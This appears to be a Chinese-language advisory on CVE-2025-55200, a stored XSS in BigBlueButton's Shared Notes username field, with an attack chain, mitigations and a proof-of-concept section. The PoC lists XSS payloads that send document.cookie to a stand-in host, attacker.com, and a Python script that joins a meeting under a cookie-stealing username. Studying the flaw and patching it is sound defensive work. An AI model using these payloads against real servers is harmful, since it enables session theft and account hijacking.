CVE-2025-55200 BigBlueButton共享笔记功能存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-55200

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BigBlueButton（开源虚拟课堂平台）

漏洞概述

CVE-2025-55200是BigBlueButton开源虚拟课堂平台中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于BigBlueButton的"共享笔记"（Shared Notes）功能中，影响3.0.13之前的所有版本。漏洞的输入位置为用户注册时的"用户名"（Username）字段，输出位置为"共享笔记"页面。当具有恶意用户名的用户在编辑共享笔记内容时，恶意脚本会被持久化存储在共享笔记页面中。该漏洞允许低权限用户（如普通参会者）在高权限用户（如管理员）打开共享笔记页面时执行任意JavaScript代码。由于管理员通常具有更高的系统权限，攻击者可以通过窃取管理员会话、Cookie或执行特权操作来获取对系统的未授权访问。该漏洞的CVSS 3.1评分为7.1分，属于高危级别，攻击向量为网络攻击，需要低权限认证，但无需用户交互。机密性影响为高，完整性影响为低，可用性影响为无。BigBlueButton官方已在3.0.13版本中修复了该问题，建议所有使用受影响版本的用户尽快升级到最新版本以保护系统安全。

技术细节

该漏洞是一个典型的存储型XSS漏洞，其技术原理如下：BigBlueButton的共享笔记功能基于Etherpad-like的协同编辑工具（bbb-pads），允许会议参与者在会议过程中共同编辑笔记内容。漏洞的根本原因在于系统未对用户名字段进行充分的输入验证和输出编码。当用户注册或加入会议时，其用户名被存储到系统中。当该用户参与共享笔记的编辑时，其用户名会被插入到共享笔记页面的HTML上下文中。由于缺少适当的HTML实体编码或内容安全策略（CSP）保护，攻击者可以构造包含恶意JavaScript代码的用户名，例如：<script>alert(document.cookie)</script>或<img src=x onerror=fetch('http://attacker.com/steal?c='+document.cookie)>。当管理员或其他高权限用户打开共享笔记页面查看内容时，嵌入在用户名中的恶意脚本将在受害者浏览器上下文中自动执行。攻击者可以利用此漏洞窃取会话Cookie、执行CSRF攻击、劫持管理员账户、访问敏感会议数据或执行其他恶意操作。由于这是存储型XSS，恶意负载会持久化存储在共享笔记中，每次有用户访问该页面都会触发攻击，具有较高的危害性和持续性。修复版本通过在用户名渲染到HTML时进行适当的转义处理来解决此问题。

攻击链分析

STEP 1

步骤1：创建恶意用户名

攻击者注册BigBlueButton账户或在加入会议时设置包含恶意JavaScript代码的用户名，例如使用<img>标签的onerror事件处理器或<script>标签来构造XSS负载。

STEP 2

步骤2：加入目标会议

攻击者使用恶意用户名加入目标会议，以低权限用户（如普通参会者）身份参与会议。

STEP 3

步骤3：触发存储

当攻击者编辑或参与共享笔记的编辑时，其恶意用户名被插入到共享笔记页面的HTML上下文中，由于缺少输出编码，恶意脚本被持久化存储。

STEP 4

步骤4：等待受害者访问

攻击者等待高权限用户（如会议管理员）打开共享笔记页面查看内容。

STEP 5

步骤5：执行恶意代码

当管理员打开共享笔记页面时，存储的恶意JavaScript代码在其浏览器上下文中自动执行，可窃取会话Cookie、劫持账户或执行其他特权操作。

STEP 6

步骤6：权限提升和数据窃取

攻击者利用窃取的管理员会话执行未授权操作，如访问敏感会议数据、修改系统配置或进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-55200: BigBlueButton Stored XSS via Username field
Vulnerability: Stored XSS in Shared Notes feature
Attack Vector: Username field -> Shared Notes page rendering
-->

<!-- Step 1: Register or join a BigBlueButton meeting with a malicious username -->
<!-- The malicious username contains JavaScript payload that will be stored -->

<!-- Malicious Username Payload Examples: -->

<!-- Payload 1: Simple cookie stealing -->
<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>

<!-- Payload 2: Session hijacking via image tag -->
<img src=x onerror="new Image().src='http://attacker.com/log?c='+document.cookie">

<!-- Payload 3: SVG-based XSS -->
<svg/onload=alert('XSS-'+document.domain)>

<!-- Payload 4: Event handler based -->
<body onload="fetch('http://attacker.com/exfil',{method:'POST',body:document.cookie})">

<!-- Step 2: Join the meeting and edit the Shared Notes -->
<!-- The malicious username will be rendered in the Shared Notes page -->

<!-- Step 3: When an admin or privileged user opens the Shared Notes page, -->
<!-- the stored XSS payload executes in their browser context -->

<!-- Python exploit example to automate registration with malicious username -->
import requests

TARGET = "https://bbb.example.com"
MEETING_ID = "random-meeting-id-12345"
ATTACKER_SERVER = "http://attacker.com/steal"

# Malicious username with XSS payload
malicious_username = f'<img src=x onerror="new Image().src=\'{ATTACKER_SERVER}?c=\'+document.cookie">'

# Join meeting API endpoint
join_url = f"{TARGET}/bigbluebutton/api/join"
params = {
    'fullName': malicious_username,
    'meetingID': MEETING_ID,
    'password': 'attendee-password',
    'joinURL': f"{TARGET}/bigbluebutton/api/join",
}

# Note: Actual API call would require proper checksum from BBB server
response = requests.get(join_url, params=params)
print(f"Joined meeting with malicious username: {malicious_username}")
print("Waiting for admin to open Shared Notes page...")

影响范围

BigBlueButton < 3.0.13

bbb-pads < v1.5.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对用户名字段实施严格的输入验证，禁止包含<、>、"、'等HTML特殊字符；2）在共享笔记页面部署严格的内容安全策略（CSP），限制内联脚本执行；3）为所有会话Cookie设置HttpOnly标志，防止JavaScript访问；4）监控共享笔记页面中的异常脚本执行行为；5）限制低权限用户与高权限用户共享同一会议空间；6）定期审查会议参与者的用户名，识别可疑的恶意用户名。